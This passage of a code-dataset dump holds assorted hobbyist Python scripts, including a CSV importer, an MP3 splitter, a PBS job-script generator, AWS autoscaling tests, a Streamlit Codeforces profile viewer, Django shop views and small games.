imported', 'Thats not an integer', 'int'))\n #end for-loop\n \n #Get Headers\n hasHeaders = GetUserInput('Does your data have headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n if hasHeaders:\n importHeaders = GetUserInput('Want to import your headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n #end if-block\n\n if not importHeaders:\n makeHeaders = GetUserInput('Want to create headers for your data?\\nNote: Only make headers for the fields you will import')\n else:\n makeHeaders = False\n #end if-else\n\n if makeHeaders:\n for i in range(howManyFields):\n headerList.append(GetUserInput('Header name for field: ', 'Not an integer', 'int'))\n firstLine = GetUserInput('Which row is the first line of data (give line with the headers on it)', 'Not an interger', 'int')\n\n #open the file and start reading\n with open(filedir) as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n if importHeaders:\n headerLoop = True\n else:\n headerLoop = False\n for i in range(firstLine - 1): #skip the lines til the first line\n next(reader)\n for row in reader:\n if headerLoop:\n for i in range(howManyFields):\n headerList.append(row[fieldLocations[i] - 1])\n #end for-loop\n headerLoop = False\n else:\n for i in range(howManyFields):\n #use the fieldLocations and iterate through their locations and get them from the row iterable\n fieldList[i].append(row[fieldLocations[i] - 1]) #account for human counting\n #end for-loop\n #end if-else block\n #end for-loop\n #end with-block\n return fieldList, headerList\n\n \n\n# MAIN ALGORITHM\n\ndef main():\n\n filedir = GetFile()\n fieldList, headerList = FieldImporter(filedir)\n TxtWriter(fieldList, headerList)\n\n\n#RUN IT!!\n\nmain()\n \n","repo_name":"mmain10/Python-Scripts","sub_path":"CSV Data Shaper.py","file_name":"CSV Data Shaper.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"19681638623","text":"import os\nimport time\nimport gc\nimport modules.helpers as helpers\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nclass Splitter:\n\n\tdef __init__(self, path, chunklength, output_directory):\n\t\tself.path = path\n\t\tself.output_directory = output_directory\n\t\tself.chunklength = chunklength\n\n\tdef split_to_chunks(self, new_name):\n\n\t\t'''\n\t\ttakes an original file, and splits it into chunk size in new path.\n\n\t\tParameters:\n\t\tnew_name (str): a new filename without extension or path\n\n\t\tex: \"users\\\\file.mp3\" should be inserted as \"file\"\n\t\t'''\n\n\t\taudio_file = AudioSegment.from_mp3(self.path)\n\n\t\taudio_remaining = True\n\t\tbeg_segment = 0\n\n\t\tpbar = tqdm(total=len(audio_file))\n\n\t\twhile audio_remaining:\n\t\t\tend_segment = beg_segment + self.chunklength\n\n\t\t\t#if remaining audio is less than chunk size, export remaining length\n\t\t\tif end_segment > len(audio_file):\n\t\t\t\tremaining_audio = end_segment - len(audio_file)\n\t\t\t\tremaining_audio = remaining_audio * -1\n\t\t\t\tfull_segment = audio_file[remaining_audio:]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" +\n\t\t\t\t\t\t\tstr(helpers.convert_to_mins(len(audio_file))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\t\taudio_remaining = False #break\n\t\t\telse:\n\t\t\t\tfull_segment = audio_file[beg_segment:end_segment]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" + \n\t\t\t\t\t\t\tstr(helpers.convert_to_mins((end_segment))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\tstart = beg_segment\n\t\t\tbeg_segment += self.chunklength #iterate\n\n\t\t\t#using this instead of regular update to make it look nicer\n\t\t\thelpers.incriment_pbar(start, beg_segment, pbar)\n\n\t\tdel audio_file\n\t\tpbar.close()\n\t\tgc.collect()\n\ndef split_all(input_directory, files_list, chunklength, output_directory):\n\n\t'''\n\tuses split_to_chunks() to loop over all files in a list of files, and split them.\n\tDeletes all files in files_list when finished.\n\n\tParameters:\n\n\tinput_directory (str): path to input directory\n\n\tfiles_list (list of str): list of files converted (ex: filename.mp3) \n\t\t\t\t\t\t\t\tpassed from AudioConverter.convert_all()\n\n\tchunklength (int): length per file (in milliseconds)\n\n\toutput_directory (str): Output directory of split files.\n\n\t'''\n\n\tprint(\"\\n\\nSplitting files\\n\\n\")\t\n\ti = 1\n\n\tfor file in files_list:\n\n\t\tprint(\"splitting: {}, file {} of {}\".format(file, str(i), str(len(files_list))) )\n\n\t\tfull_path = input_directory + \"\\\\\" + file\n\t\tfile_to_split = Splitter(full_path, chunklength, output_directory)\n\n\t\tname_without_ext = file.split(\".mp3\")[0]\n\t\tfile_to_split.split_to_chunks(name_without_ext)\n\n\t\ti += 1\n\n\tdelete_files(input_directory, files_list)\n\ndef delete_files(path, files_list):\n\n\t'''\n\tDeletes all files from files_list in a given path (directory)\n\n\tParameters:\n path (str): directory of files to be deleted\n files_list: list of files to delete within given directory.\n\n\t'''\n\tfor file in files_list:\n\t\tfull_path = path + \"\\\\\" + file\n\t\tif os.path.exists(full_path):\n\t\t\tos.remove(full_path)\n\t\t\tprint(full_path + \" removed.\")\n\n\n","repo_name":"MeijiIshinIsLame/miaudio","sub_path":"miaudio/modules/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"16599815954","text":"from sklearn.preprocessing import normalize\nimport pandas as pd\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import (\n cross_validate,\n cross_val_predict,\n)\nfrom matplotlib import ticker\nimport numpy as np\nimport seaborn as sns\n\nplt.rcParams[\"font.size\"] = 18\nfig = plt.figure()\n# from sklearn.svm import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\n\nresults = pd.read_csv(\"KNNoptimize\\knn遍历neighbourp.csv\")\n\n# show the first 5 rows\n\nxc = results[\"param_n_neighbors\"].to_numpy()\nye = results[\"param_p\"].to_numpy()\nresults[\"mean_test_score\"] = abs(results[\"mean_test_score\"])\nvm = abs(results[\"mean_test_score\"].to_numpy())\nprint(vm)\nresults = pd.DataFrame(\n results, columns=[\"param_n_neighbors\", \"param_p\", \"mean_test_score\"]\n)\n\nresults = results.pivot(\n index=\"param_n_neighbors\", columns=\"param_p\", values=\"mean_test_score\"\n)\nplot = sns.heatmap(results, cmap=\"viridis\").invert_yaxis()\nplt.xlabel(\"p\")\nplt.ylabel(\"n neighbour\")\nplt.savefig(\"KNNoptimize\\drawing.svg\")\n","repo_name":"sch401/bcbpd","sub_path":"3_different ML model traning and selection/KNN/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"71990070501","text":"import os\nimport sys\nimport yaml\n\nfrom shutil import copy\nfrom tabulate import tabulate\nclass ShellPath :\n '''\n Designate the position of shell scripts and \n check the shell scripts registered with gmd.\n '''\n def __init__(self) :\n self.shellpath = \"%s/shell\"%(os.path.split(os.path.dirname(__file__))[0])\n self.files = [f for f in os.listdir(self.shellpath)]\n\n def register_shell(self,shellpath):\n '''\n Save shell file\n '''\n if os.path.isfile(shellpath):\n filename = os.path.basename(shellpath)\n filepath = os.path.abspath(\"%s/%s\"%(self.shellpath,filename))\n if os.path.isfile(filepath):\n print(\"%s is already enrolled\\n\"%(filename))\n else :\n copy(shellpath,filepath)\n print(\"%s Successfully Save \"%(filepath))\n else :\n print(\"%s isn't file\"%(shellpath))\n\n def check(self):\n '''\n Check shell file registered \n '''\n shell = [] ; numberlist =[] ;number = 1\n for f in self.files :\n if f.split(\".\")[-1] == 'sh' :\n shell.append([number, f])\n numberlist.append(number)\n number += 1\n print(\"\\n\\n\",tabulate(shell, tablefmt='grid'),end='\\n\\n') \n return shell, numberlist\n\n def remove(self) :\n '''\n Remove the shell file registered\n '''\n shell, number = self.check()\n\n while True :\n r = int(input(\"Please enter the script name for removal >> \"))\n if r in number :\n break\n os.remove(\"{}/{}\".format(self.shellpath, shell[r-1][-1]))\n print(\"{} scirpt is deleted\".format(shell[r-1][-1]))\n\n def generateshell(self, shell) :\n \n # add function in 20220203\n if not os.path.isfile(shell['vasp_std']) :\n print(shell['vasp_std'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_ncl']):\n print(shell['vasp_ncl'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_gam']):\n print(shell['vasp_gam'],\"is not file\")\n sys.exit(1)\n # \n \n while True :\n regist = input(str(\"Please enter Y to register shell script, otherwise enter N >> \"))\n if regist == 'Y' :\n path = self.shellpath + \"/{}.sh\".format(shell['shell_name'])\n break\n elif regist == 'N' :\n path = \"{}.sh\".format(shell['shell_name'])\n break\n else :\n print(\"Please Enter Y or N\")\n\n with open(path,'w') as sh :\n sh.write(\"#!/bin/sh\\n\")\n sh.write(\"# control options #\\n\")\n sh.write(\"#PBS -N {} \\n\".format(shell['shell_name']))\n sh.write(\"#PBS -l nodes={}:ppn={}:{}\\n\".format(shell['node'],shell['ppn'],shell['node_name']))\n sh.write(\"########\\n\")\n sh.write(\"#PBS -q {}\\n\".format(shell['node_name']))\n sh.write(\"#PBS -o out.log\\n\")\n sh.write(\"#PBS -j oe\\n\")\n \n sh.write(\"\\n# PATH & EXE\\n\")\n sh.write(\"EXE='{}'\\n\".format(shell['vasp_std']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_ncl']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_gam']))\n \n sh.write(\"\\n#\\n\")\n sh.write(\"NUMBER=`cat $PBS_NODEFILE | wc -l`\\n\")\n sh.write(\"cd $PBS_O_WORKDIR\\n\")\n \n sh.write(\"\\n# run \\n\")\n sh.write(\"echo job started at `date` >> time\\n\")\n sh.write(\"{} -np $NUMBER -machinefile $PBS_NODEFILE $EXE > $PBS_JOBNAME.out\\n\".format(shell['mpi_command']))\n sh.write(\"echo job ended at `date` >> time\\n\")\n \n sh.close()","repo_name":"jgp505/perovgen","sub_path":"pygmd/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"28142041021","text":"import boto3\nfrom boto3.session import Session\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nimport pickle\nfrom io import BytesIO\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, LabelEncoder, LabelBinarizer,MultiLabelBinarizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score,StratifiedKFold, cross_validate\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport DynamoDBClient\n\ndynamodb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb', region_name='eu-west-2')\ns3 = boto3.resource('s3')\n\nACCESS_KEY = os.environ['AWS_ACCESS_KEY_ID']\nSECRET_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\n\nclass ML():\n\n def __init__(self):\n\n with BytesIO() as data:\n s3.Bucket(\"artificial-demo\").download_fileobj(\"xgb.pkl\", data)\n data.seek(0) # move back to the beginning after writing\n self.xgb = pickle.load(data)\n \n db = DynamoDBClient.DynamoDB(db_name = \"customer\")\n self.data = pd.DataFrame(db.get_all_items())\n\n print(\"----------------------------------------\")\n print(self.data.tail(1))\n \n def predict(self):\n\n\n y_pred=self.xgb.predict([self.X[-1]])\n y_proba=self.xgb.predict_proba([self.X[-1]])\n print(y_pred)\n print(y_proba)\n\n return y_pred,y_proba\n \n def pre_process(self, data):\n print(\"####### PRE-PROCESSING ###########\")\n #Numeric Features\n numeric_features= list(data.columns[data.dtypes == 'int64'])\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data[numeric_features])\n scaled_data = pd.DataFrame(data=scaled_data, columns=numeric_features)\n\n #Binary Features\n binary_features = [\"default\", \"housing\", \"loan\", \"y\"]\n lb = BinaryTransformer()\n binarised_features = lb.fit_transform(data[binary_features])\n\n # Multioutput Features\n categorical_features = list(set(list(data.columns[data.dtypes == 'object'])) - set(binarised_features))\n ohe_data = pd.get_dummies(data[categorical_features])\n new_categorical_features = ohe_data.columns\n\n cleaned_data = pd.concat([scaled_data, binarised_features, ohe_data], axis=1)\n\n \n self.X = cleaned_data.drop('y', axis=1)\n self.y = cleaned_data['y']\n \n print(\"####### REEEE ###########\")\n print(self.X.shape)\n\n pca = PCA(n_components=32)\n self.X = pca.fit_transform(self.X)\n print(self.X.shape)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2, stratify=self.y)\n\n\n\nclass BinaryTransformer( BaseEstimator, TransformerMixin ):\n #Class Constructor \n def __init__(self):\n pass\n \n #Return self nothing else to do here \n def fit( self, X, y = None ):\n return self \n \n #Method that describes what we need this transformer to do\n def transform( self, X, y = None ):\n self.columns = list(X.columns)\n result = X.copy()\n for c in result.columns:\n result[c] = result[c].apply(lambda x: 1 if x==\"yes\" else 0)\n \n return result","repo_name":"lok63/artificial_serverless","sub_path":"machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"25432613834","text":"from datetime import datetime\r\nfrom aws_wrappers import AWS_Wrappers\r\nfrom utility import Utility\r\nutility = Utility()\r\naws_wrappers =AWS_Wrappers()\r\n\r\ndef test_ScheduledActions(ASGName): #TestCase B: Point 1: Find the Scheduled actions of given ASG which is going to run next and calcalate elapsed in hh:mm:ss from current time.\r\n try:\r\n scheduled_action_details = aws_wrappers.get_scheduled_actions(ASGName) # Get the sheduled actions of ASG\r\n scheduled_actions_list = scheduled_action_details.scheduled_update_group_actions #List of Scheduled of scheduled actions\r\n if len(scheduled_actions_list) == 0:\r\n print(\"No Scheduled Actions found\")\r\n assert False\r\n\r\n scheduled_action_recurrence={}\r\n try:\r\n for scheduled_action in scheduled_actions_list:\r\n # Get the next running time from Cron Expression and get the time delta between now and cron expression time\r\n scheduled_action_recurrence[scheduled_action.scheduled_action_name] = (utility.get_next_schedule_from_cron(scheduled_action.recurrence)-datetime.now()).total_seconds()\r\n\r\n next_running_job= min(scheduled_action_recurrence, key=scheduled_action_recurrence.get) # Get the minimum time of jobs which is nothing but latest job to run\r\n print(\"Job to Run Next : \" + next_running_job)\r\n except KeyError:\r\n pass ## if job is non recurring\r\n try:\r\n ## To find elapsed time from now from previous ran all jobs\r\n for scheduled_action in scheduled_actions_list:\r\n action_name= scheduled_action.scheduled_action_name # Get all action name list\r\n time_elapsed = datetime.now() - utility.get_previous_schedule_from_cron(scheduled_action.recurrence) # Get time of previous run from Cron\r\n print(\"Time Elapsed: \" + action_name + \" \"+str(time_elapsed)) ## prints elapsed time in hh:mm:ss\r\n assert True\r\n except KeyError:\r\n pass ## if job is non recurring\r\n except Exception as e:\r\n assert False\r\n\r\ndef test_ScalingDayActivity(ASGName):\r\n try:\r\n scaling_activities = aws_wrappers.describe_scaling_activities(ASGName) # Get all scaling activities result\r\n today_activities= []\r\n for activities in scaling_activities:\r\n for act in activities:\r\n start_date = act['StartTime'].date() # get the start time of the instance\r\n status = act['StatusCode']\r\n if start_date == datetime.now().date() and status == 'Successful': # Get the activities of today wich are success\r\n today_activities.append(act['ActivityId'])\r\n if len(today_activities)==0:\r\n print(\"No instances Launched or Terminated today\")\r\n assert False\r\n else:\r\n print (str(len(today_activities))+ \" instances launched or terminated today\")\r\n assert True\r\n except Exception as e:\r\n print(str(e))\r\n assert False\r\n\r\n\r\n","repo_name":"csegourab6/livevox-assignment-task-1","sub_path":"test_ScheduledActions.py","file_name":"test_ScheduledActions.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"75249470180","text":"import random\r\nfrom typing import ParamSpecArgs\r\ndef get_choices():\r\n player_choice=input(\"Choose your choice in(stone,paper,sessor)\")\r\n option=[\"rock\",\"paper\",\"sissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"player\":player_choice,\"computer\":computer_choice}\r\n return choices\r\ndef dj(player,computer):\r\n print(f\"you choose {player} computer choose {computer}\")\r\n if player==computer:\r\n return \"draw\"\r\n elif player==\"rock\":\r\n if computer==\"paper\":\r\n return \"paper will cover the rock and You lost\"\r\n else:\r\n return \"rock will cut the sissor and You win\"\r\n elif player==\"sissor\":\r\n \r\n if computer==\"paper\":\r\n return \"sissor will cut the paper,You Win\"\r\n else:\r\n return \"rock will broke the sissor,You lost\"\r\n\r\n elif player==\"paper\":\r\n if computer==\"sissor\":\r\n return \"sissor will cut the paper,you lost\"\r\n else:\r\n return \"paper will cover the stone ,you win\"\r\na=get_choices()\r\nresult=dj(a[\"player\"],a[\"computer\"])\r\nprint(result)\r\n","repo_name":"shanmugapandiyan/python-basics","sub_path":"python_simple_game.py","file_name":"python_simple_game.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23297862150","text":"s = [\"Franta\", \"Pepa\", \"Vašek\", \"Ignác\"]\r\n\r\n\r\ndef od1():\r\n global s\r\n s.append(input(\"napiš další jméno\"))\r\n otazka()\r\n\r\n\r\ndef od2():\r\n global s\r\n print(s)\r\n s.remove(input(\"napis jmeno\"))\r\n otazka()\r\n\r\n\r\ndef od3():\r\n global s\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od4():\r\n global s\r\n print(\"v seznamu je\", len(s), \"jmen\")\r\n otazka()\r\n\r\n\r\ndef od5():\r\n global s\r\n s.sort()\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od6():\r\n print(\"ok\")\r\n\r\n\r\ndef otazka():\r\n global s\r\n print(\"1.Pridat jmeno\")\r\n print(\"2.odebrat jmeno\")\r\n print(\"3.vypsat seznam\")\r\n print(\"4.kolik je jmen v seznamu\")\r\n print(\"5.seznam jsem podle abecedy\")\r\n print(\"6.konec programu\")\r\n o = int(input(\"vyber\"))\r\n if o == 1:\r\n od1()\r\n if o == 2:\r\n od2()\r\n if o == 3:\r\n od3()\r\n if o == 4:\r\n od4()\r\n if o == 5:\r\n od5()\r\n elif o == 6:\r\n od6()\r\n\r\n\r\notazka()\r\n","repo_name":"EducaNet-school/zelvi-grafika-PetrPujman","sub_path":"seznamy/seznamy 6.py","file_name":"seznamy 6.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"42407309987","text":"import altair as alt\nimport datetime\nimport streamlit as st\nimport json\nimport requests\nimport pandas as pd\nimport pycountry as pc\n\n\ndef find_best_matches(strs, s):\n results = []\n for x in strs:\n if s.lower() in x.lower():\n results.append(x)\n if len(results) == 7:\n return results\n return results\n\n\ndef main():\n\n data = []\n handle_tuples = []\n handles = []\n default_index = 0\n with open('codeforces_crawler\\codeforces_crawler\\spiders\\items_codeforces_spider_4.jl') as file:\n for i, line in enumerate(file):\n json_obj = json.loads(line)\n data.append(json_obj)\n handle_tuples.append((json_obj['handle'], i))\n if json_obj['handle'] in 'y0urs3lf':\n default_index = i\n handles = [t[0] for t in handle_tuples]\n\n st.write(\"# Codeforces User's Profile\")\n\n query = st.text_input(\n \"label\", placeholder=\"Enter a handle you want to find. For example: y0urs3lf\", label_visibility='hidden')\n\n selected_handle = \"\"\n\n # and ((not 'check' in st.session_state) or st.session_state['check'] == False):\n button_frames = []\n if query != \"\":\n # Call the search function and display the results\n results = find_best_matches(handles, query)\n if len(results) == 0:\n st.write(\"No results found\")\n else:\n st.write(f'Best results for **{query}**:')\n # (not 'check' in st.session_state) or st.session_state['check'] == False:\n if True:\n for result in results:\n # Display the result as a clickable link\n button_frame = st.empty()\n isClicked = button_frame.button(\n result, use_container_width=True, key=result)\n button_frames.append((button_frame, result))\n if isClicked:\n # Change the context of the page based on the selected result\n # result_frame.empty()\n selected_handle = result\n # st.session_state['check'] = True\n break\n\n if selected_handle != \"\":\n for (frame, handle) in button_frames:\n if handle != selected_handle:\n frame.empty()\n\n index = handles.index(selected_handle)\n\n user_info = data[index]\n rank = user_info['rank'][0:len(user_info['rank'])-1]\n color = get_color(rank)\n cur_handle = user_info[\"handle\"]\n\n st.markdown(\n f'
{rank.title()}
{cur_handle}
', unsafe_allow_html=True)\n\n # flag image and country\n country = user_info[\"country\"]\n if country != \"\":\n country_code = get_country_code(country).lower()\n image_url = f'https://codeforces.org/s/33207/images/flags-16/{country_code}.png'\n st.markdown(\n f'
{country}
',\n unsafe_allow_html=True\n )\n else:\n st.markdown(\n f'
{country}
',\n unsafe_allow_html=True\n )\n\n # rating\n st.markdown(\n f'
Rating:{str(user_info[\"rating\"])}
',\n unsafe_allow_html=True\n )\n\n # max rating\n max_rating_color = get_color(user_info[\"max_rank\"])\n st.markdown(\n f'
Max Rating: {str(user_info[\"max_rating\"])}, {user_info[\"max_rank\"].title()}', unsafe_allow_html=True\n )\n\n # request data to render the chart\n # return\n url = f\"https://codeforces.com/api/user.rating?handle={selected_handle}\"\n response = requests.get(url).json()\n\n if response[\"status\"] == \"OK\":\n data = response[\"result\"]\n\n contestName, rating, time, rank = [], [], [], []\n for x in data:\n contestName.append(x.get(\"contestName\"))\n rating.append(x.get(\"newRating\"))\n\n # convert time from unix-format -> date\n timestamp = x.get(\"ratingUpdateTimeSeconds\")\n dt_object = datetime.datetime.fromtimestamp(timestamp)\n formatted_date = dt_object.strftime('%Y-%m-%d')\n time.append(formatted_date)\n\n rank.append(x.get(\"rank\"))\n\n chart_data = pd.DataFrame(\n {\n 'contestName': contestName,\n 'rating': rating,\n 'time': time,\n 'rank': rank,\n })\n\n # altair support rendering chart with limit value in the axis\n y_min = max(0, min(chart_data[\"rating\"]) - 100)\n y_max = max(chart_data[\"rating\"]) + 100\n\n scale = alt.Scale(domain=(y_min, y_max))\n\n chart = alt.Chart(chart_data).mark_line(\n point=alt.OverlayMarkDef(\n size=50, filled=False, color=\"#4A55A2\", fill=\"#A0BFE0\"), # properties of the point\n color=\"#A0BFE0\" # color of the line\n ).encode(\n x='time:T', # the :T is added to display x-axis as Time, not String => more interactive\n # the alt.y is added to show the points in certain range\n y=alt.Y('rating', scale=scale),\n tooltip=['contestName', 'rank'],\n ).interactive()\n\n # Render the chart using Streamlit\n st.altair_chart(chart, use_container_width=True)\n else:\n st.write(\"**Error:**\", response[\"comment\"])\n else:\n pass\n\n\ndef get_color(rank):\n if rank == \"legendary grandmaster\":\n return \"black\"\n if rank == \"international grandmaster\":\n return \"red\"\n if rank == \"grandmaster\":\n return \"red\"\n if rank == \"international master\":\n return \"orange\"\n if rank == \"master\":\n return \"orange\"\n if rank == \"candidate master\":\n return \"purple\"\n if rank == \"expert\":\n return \"blue\"\n if rank == \"specialist\":\n return \"cyan\"\n if rank == \"pupil\":\n return \"green\"\n return \"grey\"\n\n\ndef get_country_code(country_name):\n if country_name == \"Vietnam\":\n return \"Vn\"\n if country_name == \"Taiwan\":\n return \"Tw\"\n try:\n country = pc.countries.get(name=country_name)\n return country.alpha_2\n except AttributeError:\n return \"\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnnam03/codeforces-tools","sub_path":"no_api_cf_user_info.py","file_name":"no_api_cf_user_info.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"8095913568","text":"import pygame\nfrom player import Player\n\n# Initialize pygame\npygame.init()\n\n# Create the screen (width, height)\nscreen = pygame.display.set_mode((800, 640))\nprint(\"Hello\")\n\n# Title and Icon\n# Caption is the title of the window\npygame.display.set_caption(\"Jeraldyn\")\n# Icon is the image on the top left of the window\n#icon = pygame.image.load('ufo.png')\n# Set the icon\n#pygame.display.set_icon(icon)\n\n# Player Images\nplayerImg = pygame.image.load('Images/Main-Character/character-0.png')\n\n# Create Instance of player\nplayer = Player()\n\n# Game loop\nrunning = True\n\n# While the game is running\nwhile running:\n\n # Event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n screen.fill((91,153,139))\n\n #Update the player\n player.update(event)\n \n # Draw the player\n screen.blit(playerImg, (player.playerX, player.playerY))\n\n # Update the screen\n pygame.display.update()","repo_name":"jalenm872/Pygame-Game-One","sub_path":"first-game.py","file_name":"first-game.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"73638295139","text":"from django.db.models import Prefetch, Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\n\nfrom apps.sneaker.models import Sneaker, SneakerSize, Brand\n\nSORT_RULE_MAP = {\n 1: '-click_num',\n 2: '-created_at',\n 3: '-discount_price',\n 4: 'discount_price',\n}\n\n\ndef get_sneakers_sort(sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n return Sneaker.objects.prefetch_related('sneaker_image').filter(is_active=True).order_by(sort_key)\n\n\ndef get_sneakers_with_brand_sort(brand_id, sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n brand = get_object_or_404(Brand, id=brand_id)\n sneakers = Sneaker.objects.filter(\n Q(brand_id=brand_id) & Q(is_active=True)\n ).order_by(sort_key)\n return brand, sneakers\n\n\ndef sneaker_sort_return(request, brand_id, sort_rule):\n if brand_id == 0:\n sneakers = get_sneakers_sort(sort_rule)\n return render(request, 'index.html', {'sneakers': sneakers})\n else:\n brand, sneakers = get_sneakers_with_brand_sort(brand_id, sort_rule)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef sneaker_all(request):\n sneakers = get_sneakers_sort(1)\n return render(request, 'index.html', {'sneakers': sneakers})\n\n\ndef get_recommendation(sneaker_id):\n sneaker = get_object_or_404(Sneaker, id=sneaker_id)\n brand_id = sneaker.brand.id\n brand_sneakers = Sneaker.objects.filter(Q(brand_id=brand_id) & (~Q(id=sneaker_id))).order_by('-click_num')\n return brand_sneakers\n\n\ndef sneaker_detail(request, pk):\n sneaker = get_object_or_404(\n Sneaker.objects.prefetch_related(\n Prefetch('sneaker_size', queryset=SneakerSize.objects.order_by('size'))),\n pk=pk, is_active=True\n )\n\n click_num = sneaker.click_num\n sneaker.click_num = click_num + 1\n sneaker.save()\n\n other_sneakers = get_recommendation(sneaker.id)\n return render(request, 'sneaker/detail.html', {'sneaker': sneaker, 'other_sneakers': other_sneakers})\n\n\ndef brand_detail(request, pk=None):\n brand, sneakers = get_sneakers_with_brand_sort(pk, 1)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef search(request):\n keywords = request.GET.get('keywords')\n sneakers = Sneaker.objects.none()\n if len(keywords) != 0:\n keyword_list = keywords.split()\n for keyword in keyword_list:\n res = Sneaker.objects.filter(Q(brand__name__icontains=keyword) | Q(title__icontains=keyword))\n if len(res) != 0:\n if len(sneakers) == 0:\n sneakers = res\n else:\n sneakers = sneakers & res\n return render(request, 'sneaker/search_result.html', {'sneakers': sneakers})\n","repo_name":"YuboGuo1024/sneaker_mall","sub_path":"apps/sneaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"7876199752","text":"import os\nimport pytest\nfrom opgee.error import CommandlineError\nfrom opgee.config import IsWindows\nDEVNULL = 'nul' if IsWindows else '/dev/null'\n\nis_sherlock = os.environ.get('LMOD_SYSHOST') == 'sherlock'\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\n@pytest.mark.parametrize(\n \"args\", [\n ['graph', '--classes', 'core', '--classes-output', DEVNULL],\n ['graph', '--field', 'gas_lifting_field', '--field-output', DEVNULL],\n ['graph', '--hierarchy-output', DEVNULL],\n ]\n)\ndef test_graphing(opgee_main, args):\n try:\n opgee_main.run(None, args)\n good = True\n except Exception as e:\n # print(e)\n good = False\n\n assert good\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\ndef test_unknown_field(opgee_main):\n with pytest.raises(CommandlineError, match=r\"Field name .* was not found in model\"):\n opgee_main.run(None, ['graph', '--field', 'unknown-field'])\n","repo_name":"Stanford-EAO/OPGEEv4","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"}
